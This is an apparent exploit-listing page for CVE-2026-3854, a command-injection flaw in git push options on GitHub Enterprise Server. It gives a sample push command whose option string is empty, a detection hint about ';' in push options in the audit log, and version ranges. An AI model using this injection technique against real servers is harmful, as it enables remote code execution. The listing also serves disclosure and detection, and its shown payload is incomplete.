## https://sploitus.com/exploit?id=61DD2AD4-9EEB-5525-A9CB-BF5E6EAA355B
# Exploit_CVE-2026-3854
CVE-2026-3854 is a Remote Code Execution in GitHub.com and GitHub Enterprise Server
The vulnerability could be exploited by injecting commands into the git push command as follows :
```
git push -o '' origin master
```
To review any exploitation of this vulnerability, we recommend that you review /var/log/github-audit.log for push operations containing ";" in push options.
Vulnerable Versions :
GitHub Enterprise Server <= 3.19.1
Fixed Version :
3.14.24, 3.15.19, 3.16.15, 3.17.12, 3.18.6 and 3.19.3